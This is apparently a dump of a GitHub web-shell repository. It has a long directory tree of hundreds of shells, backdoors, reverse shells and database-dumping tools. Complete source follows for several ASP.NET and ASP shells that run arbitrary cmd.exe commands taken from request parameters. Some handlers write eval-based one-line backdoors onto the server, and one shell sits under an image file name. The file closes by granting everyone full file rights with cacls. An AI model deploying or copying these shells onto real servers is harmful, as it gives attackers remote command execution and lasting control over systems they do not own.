├── Aar └── Axis2Shell-master.zip ├── Ascx └── shell.ascx ├── Ashx ├── Hypn.ashx ├── include.ashx ├── shell.jpg ├── write_asp_file.ashx ├── write_aspx_file.ashx └── xx.ashx ├── Asmx ├── Customize.asmx └── usage.txt ├── Asp ├── 08小组内部交流专用.asp ├── 3fexe Shell.asp ├── 404 infiltrate team.asp ├── 80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp ├── ASP Cmd Shell On IIS 5.1.asp ├── ASPYDrvsInfo.asp ├── AspRootkit 1.0 by BloodSword.asp ├── Aventis KlasVayv 1.0.asp ├── CmdAsp.asp ├── CyberSpy5.Asp ├── DJ团队.asp ├── ELMALISEKER Backd00r.asp ├── Elmali Seker.asp ├── Expdoor.com ASP专用小马.asp ├── File upload.asp ├── I.N.F HACKING CENTER.asp ├── JspWebShell By 绝对零度.asp ├── KOA ASP类 WebShell扫描工具.asp ├── NTDaddy v1.9.asp ├── PcAnywhere提权 Bin版本.asp ├── RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp ├── RHTOOLS 1.5 BETA(PVT).asp ├── RedHat Hacker.asp ├── RedHat Hacker.asp明文版.asp ├── Remote Explorer.asp ├── STHx 渗透小组专用 ASP小马.asp ├── Server Variables.asp ├── Stored Procedure Execute.aspx ├── TNTHK加密小马.asp ├── UnKnown 高级Vip防删收费版.asp ├── Web Shell.asp ├── Welcome To AK Team.asp ├── ZehirIV.asp ├── asp wget drag database.asp ├── aspSH.v1.asp ├── aspxshell.aspx ├── by EJDER.asp ├── bypass-iisuser-p.asp ├── devilzShell.asp ├── devshell.asp ├── download 下载文件.asp ├── forever5pi.asp ├── h4ck_Door.asp ├── hkmjj.asp ├── inDEXER And ReaDer.asp ├── list.cer ├── mssql.asp ├── r00ts小组过防火墙马.asp ├── r00ts无FSO组建大马.asp ├── radhat.asp ├── up.asp ├── upfile_write.asp ├── upfile_write.rar ├── xynu-Normal University.asp ├── 上传小马.asp ├── 不灭之魂.asp ├── 不灭之魂2013改进版本.asp ├── 传说中的hcker.asp ├── 传说中的草泥马4.0.asp ├── 修改属性.asp ├── 啊D小工具 - 目录读写检测 [ASP版].asp ├── 图片一句话 │ ├── JFIF.asp │ ├── gif87a.jpg │ ├── gif89a.asp │ ├── img.jpg │ └── mima_abcd.jpg ├── 土司搞基asp大马.asp ├── 在线数据库管理工具 1.5.asp ├── 密码:889.asp ├── 小强asp木马.asp ├── 小红帽.asp ├── 很好用的扫可读可写目录asp脚本xwdir.asp ├── 旁注 - 网站小助手.asp ├── 星外-华众-新网-虚拟主机提权专用Webshell Mumaasp.com发布.asp ├── 星外-华众-新网-虚拟主机提权专用Webshell.asp ├── 木马帮V1.1-火舌版.asp ├── 法克僵尸大马.asp ├── 海阳顶端网ASP木马@2006PLUS - By Marcos.asp ├── 火狐NEW WebShell.asp ├── 炽天使.asp ├── 牛逼免杀提权隐藏大马.asp ├── 目录扫描.asp ├── 目录扫描读写马.asp ├── 红狼ASP木马--Anfly免杀版.asp ├── 草莓webshell.asp ├── 虚拟主机提权专用Webshell去后门版.asp ├── 虚拟机主机提权大马.asp ├── 银河舰队大马_2014版.asp └── 银河舰队大马_2015专版asp大马.asp ├── Aspx ├── ASP.NET Web BackDoor.aspx ├── ASPX ├── ASPX Shell.aspx ├── ASPX one line Code Client by amxku.aspx ├── ASPXspy by NightRunner.aspx ├── ASPXspy.aspx ├── ASPX小马 - 黑兵社团.aspx ├── Antak Webshell.aspx ├── AspxSpy2014Final.aspx ├── Code by Bin.aspx ├── Command.aspx ├── MYSQL Manager -Asp.net Silic Group Hacker Army专用版本.aspx ├── SQL.aspx ├── Stored Procedure Execute.aspx ├── Web Sniffer.aspx ├── WebAdmin 2.X Final.aspx ├── WebSniff 1.0 Powered by C.C.T.aspx ├── awen asp.net webshell.aspx ├── cmdsql.aspx ├── devilzShell.aspx ├── filesystembrowser.aspx ├── fileupload.aspx ├── hec.aspx ├── view.aspx ├── wso.aspx ├── xxooxx.aspx ├── z8VSmO1418105414843.jpg ├── 上传马.aspx ├── 专版aspx汗血宝马.aspx ├── 从注册表中读存在路径.aspx ├── 冰锋刺客.aspx ├── 凝聚科技专用AspX大马 Bysunue.aspx └── 国外牛逼大马.aspx ├── C ├── cmd.c └── findsock.c ├── Cfm ├── ColdFusion.chm ├── cfSQL.cfm ├── cfexec.cfm ├── cfmShell.cfm ├── cmd.cfm ├── cmfshell.cmf ├── devshell.cfm ├── devshell.md ├── list.cfm ├── mycode12.cfm ├── xl.cfm └── 一句话 │ └── ice.cfm ├── Cgi ├── Gamma Web Shell.cgi └── devilzShell.cgi ├── Javascript ├── JSRat.ps1 └── README.md ├── Jsp ├── BackerHack JSP Manage-System 1.0.jsp ├── Command Execution (win32).jsp ├── GetShell.html ├── JFoler 1.0.jsp ├── JSP Backdoor Reverse Shell.jsp ├── JSP Shell 岁月联盟专用版本.jsp ├── JspDo Code By Xiao.3.jsp ├── JspHelper Codz By - Leo.jsp ├── JspSpy Codz By - Ninty.jsp ├── JspSpy Codz By - Ninty_1.jsp ├── JspSpy Private Codz By - Ninty.jsp ├── JspSpy Private Codz By - Ninty_encode.jsp ├── JspSpy.jsp ├── JspTqz.jsp ├── Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp ├── Jsp反弹shell.txt ├── Mysql Database.jsp ├── Oracle Database.jsp ├── SJavaWebManageV1.4.jsp ├── Silic Group.jsp ├── XXOO.jsp ├── by Bagheera.jsp ├── cmdjsp.jsp ├── devilzShell.jsp ├── hahahaha小马.JSp ├── jshell ver 0.1.jsp ├── jshell ver 1.0.jsp ├── jspspy_k8.jsp ├── jspy.jsp ├── logger小马.jsp ├── login.jsp ├── pwnshell - an interactive jsp shell.jsp ├── 一句话 │ └── caidao.jsp ├── 上传小马.jsp ├── 内网扫描header.jsp ├── 内网探测.jsp ├── 反弹 │ ├── shell.jsp │ └── spjspshell.jsp ├── 园长-jsp │ ├── cat.jar │ ├── cat.jsp │ ├── cat.jspx │ └── 使用说明.txt ├── 图片马 │ ├── 023.jsp │ ├── 1427683968524.jpg │ ├── demo.gif │ └── 使用方法.txt ├── 小马.jsp ├── 新型JSP小马支持上传任意格式文件.jsp ├── 灭天远程管理.jsp ├── 老V.jsp └── 苦咖啡专用.jsp ├── Jspx ├── base64.jspx ├── base64.md ├── cmd.jpg ├── cmd.jspx ├── jsp.jpg ├── jspspy.jspx ├── jspx.jspx ├── oo.jpg └── paxmac.jspx ├── LICENSE ├── Mysql └── mysql_audit_plugin │ ├── README.md │ ├── audit_null.c │ └── audit_null.patch ├── Nginx └── pwnginx-master.zip ├── Other ├── Axis2Shell │ ├── README.md │ ├── Utils.java │ └── config.aar ├── File include Bypass │ ├── includer.php │ ├── includer.txt │ ├── litteryi.txt │ └── litteryixx.ASP ├── acat │ ├── ACat-src.zip │ ├── ACat-附数据库驱动-jdk1.5.jar │ ├── ACat-附数据库驱动.jar │ ├── ACat.jar │ ├── ACat_jdk1.5.jar │ └── readme.md ├── cat.aar │ ├── Readme.md │ ├── axis2 利用小工具cat.aar.zip │ └── axis2 利用小工具cat.pdf ├── jdk1.3webshell │ ├── readme.MD │ ├── test.ear │ └── test.war └── reGeorg-master.zip ├── Php ├── 12309.php ├── 404 Not Found.php ├── 404.php ├── 404webshell.php ├── 529.php ├── A robust backdoor script made by Daniel Berliner.php ├── AK-74 Security Team Web Shell Beta Version.php ├── AK-74 Security Team.php ├── ASPYDrvsInfo.php ├── Ajax_PHP Command Shell.php ├── Ani-Shell.php ├── Antichat Shell v1.3.php ├── Antichat Shell. Modified by Go0o$E.php ├── Antichat Shell.php ├── Antichat Socks5 Server v 1.0.php ├── Antichat_Shell_v1.3.php ├── Aria cPanel cracker version 1.0 - Edited By KingDefacer.php ├── AventGrup-Sincap 1.0.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.php ├── Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt ├── B374k Beta ShElL V1.php ├── BLaSTER.php ├── Back Connect.php ├── Backdoor php v0.1 Coded By Charlichaplin.php ├── Backup script on server.php ├── Bnkqbakq.php ├── C99madShell v. 2.0 madnet edition.php ├── Carbylamine PHP Encoder.php ├── CasuS 1.5.php ├── Changing CHMOD Permissions Exploit.php ├── Command Shell.php ├── Confusion to encrypt php webshell.php ├── Coppermine Photo Gallery = 1.4.3 remote cmmnds xctn.php ├── CrystalShell v.1.php ├── Cyber Shell.php ├── DAws.php ├── DDoS attack.php ├── DTool Pro.php ├── Deface Keeper 0.2.php ├── Dive Shell 1.0 - Emperor Hacking Team.php ├── Dive_Shell_1.0_Emperor_Hacking_Team.php ├── Dx.php ├── Edited By KingDefacer.php ├── EgY_SpIdEr ShElL V2.php ├── FaTaL Shell v1.0 - Edited By KingDefacer.php ├── GFS web-shell ver 3.1.7 - PRiV8.php ├── GFS_web-shell_ver_3.1.7_-_PRiV8.php ├── GRP WebShell 2.0 release build 2018 (C)2006,Great.php ├── Gamma Web Shell.php ├── I-47 v1.3.php ├── KA_uShell 0.1.6.php ├── KAdot Universal Shell v0.1.6.php ├── KAdot_Universal_Shell_v0.1.6.php ├── Knull Shell.php ├── LOTFREE PHP Backdoor v1.5.php ├── Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php ├── Loader'z WEB Shell v 0.1.0.2.php ├── Loaderz WEB Shell.php ├── Lolipop.php - Edited By KingDefacer.php ├── Macker's Private PHPShell.php ├── Matamu Mat.php ├── Micro_Webshell.php ├── Moroccan Spamers Ma-EditioN By GhOsT.php ├── Moroccan_Spamers_Ma-EditioN_By_GhOsT.php ├── MySQL Web Interface Version 0.8.php ├── MySQL Web Shell.php ├── Mysql interface v1.0.php ├── Mysql udf by M4ster.php ├── Mysql_interface_v1.0.php ├── NCC Shell v1.0.0.php ├── NCC-Shell.php ├── NGH.php ├── NTDaddy v1.9.php ├── NetworkFileManagerPHP.php ├── Non-alphanumeric.php ├── PH Vayv.php ├── PHANTASMA.php ├── PHP Shell.php ├── PHP Web Shell by oTTo.php ├── PHP 搜索可读可写目录脚本.php ├── PHP-Shell-Detector-master.zip ├── PHPJackal v1.9.php ├── PHPRemoteView.php ├── PHP小马 - ExpDoor.com.php ├── PHP整站打包程序-By DoDo.php ├── PHP检测文件夹权限.php ├── PHVayv.php ├── PH_Vayv.php ├── Password Hasher for PHP Shell 2.1.php ├── Php Backdoor v 1.0 by ^Jerem.php ├── PhpShell 2.0.php ├── PhpSpy Ver 2006.php ├── PostgreSQL数据库操纵.php ├── Predator.php ├── Private x0rg Web Hosting Bypass.php ├── README.md ├── Rootshell.v.1.0.php ├── SPS-3.0免杀.php ├── SST Sheller.php ├── STNC WebShell v0.8.php ├── Safe mode breaker.php ├── Safe0ver Shell -Safe Mod Bypass By Evilc0der.php ├── Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php ├── Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php ├── Security House - Shell Center - Edited By KingDefacer.php ├── Serv-U本地权限提升工具.php ├── Shell Commander.php ├── Shell [ci] .Biz was here.php ├── Silic Group Hacker Army - BlackBap.Org.php ├── Silic Group php Webshell v3.php ├── SimAttacker - Version 1.0.0 - Edited By KingDefacer.php ├── SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php ├── SimShell 1.0 - Simorgh Security MGZ.php ├── SimShell_1.0_-_Simorgh_Security_MGZ.php ├── Simple_PHP_backdoor_by_DK.php ├── Sincap 1.0.php ├── Small Shell - Edited By KingDefacer.php ├── Small Web Shell by ZaCo.php ├── SnIpEr_SA Shell.php ├── Sosyete Safe Mode Bypass Shell - Edited By KingDefacer.php ├── Spider PHP Shell (SPS-3.0).php ├── Uploader.php ├── Uploading.php ├── W3D Shell.php ├── WSO2.7 404 Error Web Shell.php ├── Web-shell (c)ShAnKaR.php ├── WebShell.php ├── Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition.php ├── Win MOF Shell.php ├── WinX Shell.php ├── WordPress Shell.php ├── Worse Linux Shell.php ├── Worse Linux Shell.php.php ├── ZoRBaCK Connect.php ├── ZyklonShell.php ├── aZRaiLPhp v1.0.php ├── aZRaiLPhp_v1.0.php ├── accept_language.php ├── angel.php ├── ava Server Faces MiniWebCmdShell 0.2 by HeartLESS.php ├── azrail 1.0 by C-W-M.php ├── b374k-mini-shell-php.php.php ├── b374k.php.php ├── backdoorfr.php ├── backupsql.php ├── bdotw44shell.php ├── bdshell.php ├── bitwise.php ├── blackbin │ ├── 404super.php │ └── v1 │ │ ├── code.php │ │ ├── dev_core.php │ │ ├── make2.php │ │ └── readme.md ├── bns-php-shell │ ├── LICENSE │ ├── README.md │ ├── client.php │ └── server.php ├── boffmax_v1.0_web_shell_by_the-c0de_team(1).php ├── bypass safemodel.php ├── c0derz shell [csh] v. 0.1.1 release.php ├── c999shell.php ├── c99_locus7s.php ├── c99_madnet.php ├── c99_webshell.php ├── change.php ├── cls_Base.php ├── cpanel.php ├── cw.php ├── cybershell.php ├── dC3 Security Crew Shell PRiV.php ├── dC3_Security_Crew_Shell_PRiV.php ├── devilzShell.php ├── erne.php ├── ex0shell.php ├── exp.php ├── fatal.php ├── from_the_wild1.php ├── ftpsearch.php ├── g00nshell-v1.3.php ├── get.php ├── gfs_sh.php ├── h4ntu shell [powered by tsoi].php ├── h4ntu_shell_[powered_by_tsoi].php ├── hiddens shell v1.php ├── iMHaPFtp.php ├── ironshell.php ├── kolang-bypass.php ├── kral.php ├── lama's'hell v. 3.0.php ├── lamashell.php ├── license.zip ├── listfile.php ├── load_shell.php ├── lolipop.php ├── lostDC shell.php ├── lostDC.php ├── matamu.php ├── megabor.php ├── mmm.php ├── mod_joomla_shell.zip ├── mof提权带回显带清楚命令版本.php ├── moon_1php.php ├── myshell.php ├── mysql_tool.php ├── nShell v1.0.php ├── navicat_tunnel.php ├── nsT View.php ├── nshell.php ├── pHpINJ.php ├── pHp一句话扫描脚本程序.php ├── pas.php ├── php-backdoor.php ├── php-extension-backdoor │ ├── README.md │ ├── lin │ │ ├── backdoor.c │ │ └── config.m4 │ └── win │ │ ├── hideme.cpp │ │ ├── stdafx.h │ │ └── zend_config.w32.h ├── php-findsock-shell.php ├── php-include-w-shell.php ├── php-reverse-shell.php ├── phpinfo.php ├── phpshell17.php ├── phpwebbackup.php ├── php版iisspy.php ├── php读取iis.php ├── pws.php ├── qsd-php-backdoor.php ├── r57.biz Dq99Shell.php ├── r57_Mohajer22.php ├── r57_iFX.php ├── r57_kartal.php ├── r57shell v.1.42 - Edited By KingDefacer.php ├── r57shell.php ├── r57shell127.php ├── reverseshell-poc.php ├── robot.php ├── rootshell.php ├── ru24_post_sh.php ├── s72 Shell v1.0 Codinf by Cr@zy_King.php ├── s72 Shell v1.1 Coding.php ├── s72_Shell_v1.1_Coding.php ├── safe0ver.php ├── scanner.php ├── simattacker.php ├── simple-backdoor.php ├── simple_cmd.php ├── small.php ├── sniffer.php ├── soldierofallah.php ├── sosyete.php ├── spygrup.php ├── stres.php ├── sure.php ├── sys32.php ├── t57shell.php ├── toby57解析加密一句话木马.php ├── tryag.php ├── udf.dll 专用网马.php ├── up.php ├── wordpress backdoor.php ├── wp-conf.php ├── wp-conten1_pass_KoR345Ker78DSa.php ├── www.zjjv.com.php ├── xnonymoux_webshell_ver_1.0.php ├── zaco.php ├── zacosmall.php ├── 上传马.php ├── 中国木马资源网- WwW.7jyewu.Cn.php ├── 中国木马资源网-WwW.MumaSec.TK.php ├── 中转bypass │ ├── client1.php │ ├── client2.php │ ├── server1.php │ └── server2.php ├── 仗剑孤行搜索可读可写目录脚本.php ├── 图片一句话 │ ├── 404.php │ ├── JFIF.jpg │ ├── bypass_RCE_php.gif │ ├── gif89a.jpg │ ├── phppng.png │ ├── xx.png │ └── 图片马.jpg ├── 在线exp专用免杀版.php ├── 数据库 │ ├── Adminer - Compact database management.php │ ├── ntunnel_mysql.php │ └── php MySQL Database Backup Script.php ├── 极其隐蔽的pHp小马穿插在正常页面中.php └── 菊花聊天室.php ├── Pl ├── Cgitelnet.pl ├── GO.cgi.pl ├── Perl Web Shell by RST-GHC.pl ├── Silic Group_cgi.pl ├── Silic Group_readme.txt ├── WebShell.cgi.pl ├── cmd.pl ├── dc.pl ├── exim.pl ├── hmass (priv8 mass defacor).pl ├── inc.pl ├── ka0tic.pl ├── list.pl ├── lurm_safemod_on.cgi.pl ├── perl-reverse-shell.pl ├── perlcmd.cgi ├── pps-pl │ ├── pps-v1.0.pl │ ├── pps-v3.0.pl │ ├── pps-v3.5.pl │ └── pps-v4.0.pl ├── rcpexp.pl ├── remot shell.pl ├── telnet.cgi.pl ├── telnet.pl └── up.pl ├── README.md ├── SSH ├── ReverseSSH-Backdoor │ ├── Readme.txt │ ├── revsshclient.py │ └── revsshserver.py ├── custom-ssh-backdoor │ ├── README.md │ ├── client.py │ ├── print.png │ ├── server.py │ └── test_rsa.key └── sidedoor │ ├── COPYING │ ├── README.md │ ├── config │ ├── debian │ ├── changelog │ ├── compat │ ├── control │ ├── copyright │ ├── rules │ ├── sidedoor.default │ ├── sidedoor.dirs │ ├── sidedoor.docs │ ├── sidedoor.install │ ├── sidedoor.links │ ├── sidedoor.postinst │ ├── sidedoor.postrm │ ├── sidedoor.service │ ├── sidedoor.upstart │ └── source │ │ └── format │ ├── sidedoor │ ├── ssh_client_config_example │ └── sudoers ├── Soap └── Customize.soap ├── Udp ├── LiveHack │ ├── __init__.py │ ├── livehack.py │ ├── logger.py │ ├── socket_live8.py │ ├── struct.py │ └── udpio.py ├── console.py └── liveterm.py ├── WeBaCoo ├── CHANGELOG ├── LICENSE ├── MSF_README ├── README ├── TODO ├── msf_webacoo_module.rb └── webacoo.pl ├── gdog ├── .gitignore ├── LICENSE ├── README.md ├── client.py ├── data │ └── .gitignore ├── gdog.py ├── requirements.txt └── shellcode_generate.py ├── icmp ├── README.md ├── icmpsh-m.c ├── icmpsh-m.pl ├── icmpsh-s.c ├── icmpsh.exe ├── icmpsh_m.py ├── run.sh └── screenshots │ ├── response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png │ ├── running_icmpsh_master_on_attacker_machine.png │ └── running_icmpsh_slave_on_target.png ├── jar ├── readme.txt └── servlet-api-3.04.jar ├── misc ├── ASP_Client.html ├── Asp_Aspx_Php_V1.jpg ├── Asp_Aspx_Php_V2.jpg ├── Asp_Aspx_Php一句话合集.txt ├── caidao-20141213.zip ├── caidao-20160622.zip ├── jpg_payload.php ├── 合成图片马命令.txt └── 零魂PHP一句话木马客户端.htm ├── nodejs └── customize.js ├── openfire ├── openfire-test_plugin.zip └── readme.txt ├── osx └── osx-ping-backdoor │ ├── LICENSE.md │ ├── README.md │ └── ping.c ├── pwnginx ├── README.md ├── client │ ├── Makefile │ ├── functions.c │ ├── functions.h │ ├── pwnginx │ └── pwnginx.c └── module │ ├── config │ ├── config.h │ ├── ngx_http_pwnginx.c │ ├── pwnginx.c │ ├── pwnginx.h │ └── socks5.h ├── python ├── Phyton Shell.py ├── cgi-python.py ├── d00r_py3.py ├── darkBC.py.txt ├── llehs.py ├── pyspy.py ├── python3 │ ├── Client.py │ ├── README.md │ ├── Server.py │ ├── about.txt │ └── setup.py ├── sctp_reverse.py.txt ├── smtpd.py ├── webllehs.py ├── wh_bindshell.py └── xshock-0.1.tar.gz ├── reGeorg-master ├── LICENSE.html ├── LICENSE.txt ├── README.md ├── reGeorgSocksProxy.py ├── tunnel.ashx ├── tunnel.aspx ├── tunnel.js ├── tunnel.jsp ├── tunnel.php └── tunnel.tomcat.5.jsp ├── ruby └── webshell.rb ├── servlet ├── CmdServlet.java ├── ListServlet.java └── UpServlet.java ├── sh ├── cmd.sh ├── list.sh └── up.sh ├── war ├── one.war ├── one │ ├── META-INF │ │ └── MANIFEST.MF │ ├── WEB-INF │ │ └── web.xml │ ├── css.jsp │ ├── css1.jsp │ ├── one.jsp │ └── one1.jsp └── test3693.war ├── xml ├── xml.asp ├── xml.aspx ├── xml.php └── xml │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── WebShell系列(一)---XML.txt │ ├── xslt.asp │ ├── xslt.aspx │ └── xslt.php ├── xssshell-xsstunnell.zip └── 脱裤脚本 ├── MSSQL控制程序.asp ├── mssql.asp ├── mssql.aspx ├── mysql.aspx ├── mysql ├── config.inc.php ├── data │ └── index.htm ├── db_mysql.class.php ├── db_mysql_error.inc.php ├── index.php ├── pnbak.css ├── pnbak.js └── zip.func.php ├── mysql脱库.php ├── oracle.jsp ├── oracle.txt ├── phpwebbackup.php ├── xx.php └── 脱库工具.php /Aar/Axis2Shell-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aar/Axis2Shell-master.zip -------------------------------------------------------------------------------- /Ascx/shell.ascx: -------------------------------------------------------------------------------- 1 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /Ashx/Hypn.ashx: -------------------------------------------------------------------------------- 1 | <% @ webhandler language="C#" class="AverageHandler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.Diagnostics; 6 | using System.IO; 7 | 8 | public class AverageHandler : IHttpHandler 9 | { 10 | /* .Net requires this to be implemented */ 11 | public bool IsReusable 12 | { 13 | get { return true; } 14 | } 15 | 16 | /* main executing code */ 17 | public void ProcessRequest(HttpContext ctx) 18 | { 19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); 20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd"); 21 | 22 | ctx.Response.Write("
Command:
"); 23 | ctx.Response.Write("
"); 24 | ctx.Response.Write("
");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("
"); 39 | ctx.Response.Write("
"); 40 | ctx.Response.Write("By @Hypn, for educational purposes only."); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Ashx/include.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" class="Handler" %> 2 | using System; 3 | using System.Web; 4 | using System.IO; 5 | public class Handler : IHttpHandler { 6 | 7 | public void ProcessRequest (HttpContext context) { 8 | context.Response.ContentType = "text/plain"; 9 | StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx")); 10 | file1.Write(""); 11 | file1.Flush(); 12 | file1.Close(); 13 | } 14 | public bool IsReusable { 15 | get { 16 | return false; 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Ashx/shell.jpg: -------------------------------------------------------------------------------- 1 | <% @ webhandler language="C#" class="AverageHandler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.Diagnostics; 6 | using System.IO; 7 | 8 | public class AverageHandler : IHttpHandler 9 | { 10 | /* .Net requires this to be implemented */ 11 | public bool IsReusable 12 | { 13 | get { return true; } 14 | } 15 | 16 | /* main executing code */ 17 | public void ProcessRequest(HttpContext ctx) 18 | { 19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); 20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd"); 21 | 22 | ctx.Response.Write("
Command:
"); 23 | ctx.Response.Write("
"); 24 | ctx.Response.Write("
");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("
"); 39 | ctx.Response.Write("
"); 40 | ctx.Response.Write("By @Hypn, for educational purposes only."); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Ashx/write_asp_file.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" class="Handler" %> 2 | using System; 3 | using System.Web; 4 | using System.IO; 5 | public class Handler : IHttpHandler { 6 | 7 | public void ProcessRequest (HttpContext context) { 8 | context.Response.ContentType = "text/plain"; 9 | StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); 10 | file1.Write("<%response.clear:execute request(\"root\"):response.End%>"); 11 | file1.Flush(); 12 | file1.Close(); 13 | } 14 | public bool IsReusable { 15 | get { 16 | return false; 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Ashx/write_aspx_file.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" Class="Handler" %> 2 | using System; 3 | using System.Web; 4 | using System.IO; 5 | public class Handler : IHttpHandler { 6 | public void ProcessRequest (HttpContext context) { 7 | context.Response.ContentType = "text/plain"; 8 | string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"keio\"]"+",\"unsafe\");%>Hey web master,Have a nice day o.O? I hope so! HaHa"; 9 | StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 10 | file1.Write(show); 11 | file1.Flush(); 12 | file1.Close(); 13 | } 14 | public bool IsReusable { 15 | get { 16 | return false; 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Ashx/xx.ashx: -------------------------------------------------------------------------------- 1 | <%@ WebHandler Language="C#" Class="Handler" %> 2 | using System; 3 | using System.Web; 4 | using System.IO; 5 | public class Handler : IHttpHandler { 6 | public void ProcessRequest (HttpContext context) { 7 | context.Response.ContentType = "text/plain"; 8 | string show="<% @Page Language=\"Jscript\"%"+"><%Response.Write(eval(Request.Item"+"[\"xiaoma\"]"+",\"unsafe\"));%>Hey web master,Have a nice day o.O? I hope so! HaHa"; 9 | StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx")); 10 | file1.Write(show); 11 | file1.Flush(); 12 | file1.Close(); 13 | } 14 | public bool IsReusable { 15 | get { 16 | return false; 17 | } 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Asmx/Customize.asmx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asmx/Customize.asmx -------------------------------------------------------------------------------- /Asmx/usage.txt: -------------------------------------------------------------------------------- 1 | 地址填写:http://127.0.0.1/Customize.asmx/Chopper 密码:z 2 | -------------------------------------------------------------------------------- /Asp/08小组内部交流专用.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/08小组内部交流专用.asp -------------------------------------------------------------------------------- /Asp/3fexe Shell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/3fexe Shell.asp -------------------------------------------------------------------------------- /Asp/404 infiltrate team.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/404 infiltrate team.asp -------------------------------------------------------------------------------- /Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp -------------------------------------------------------------------------------- /Asp/ASP Cmd Shell On IIS 5.1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | 3 | ' ASP Cmd Shell On IIS 5.1 4 | ' brett.moore_at_security-assessment.com 5 | ' http://seclists.org/bugtraq/2006/Dec/0226.html 6 | 7 | 8 | Dim oS,oSNet,oFSys, oF,szCMD, szTF 9 | On Error Resume Next 10 | Set oS = Server.CreateObject("WSCRIPT.SHELL") 11 | Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") 12 | Set oFSys = Server.CreateObject("Scripting.FileSystemObject") 13 | szCMD = Request.Form("C") 14 | If (szCMD <> "") Then 15 | szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() 16 | ' Here we do the command 17 | Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & 18 | """",0,True) 19 | response.write szTF 20 | ' Change perms 21 | Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G 22 | everyone:F",0,True) 23 | Set oF = oFSys.OpenTextFile(szTF,1,False,0) 24 | End If 25 | %> 26 |
" method="POST"> 27 | 28 | 
29 | Machine: <%=oSNet.ComputerName%>

30 | Username: <%=oSNet.UserName%>

31 | <% 
32 | If (IsObject(oF)) Then
33 |   On Error Resume Next
34 |   Response.Write Server.HTMLEncode(oF.ReadAll)
35 |   oF.Close
36 |   Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
37 | End If 
38 | 
39 | %>
40 | 
41 | 
42 | 


--------------------------------------------------------------------------------
/Asp/Aventis KlasVayv 1.0.asp:
--------------------------------------------------------------------------------
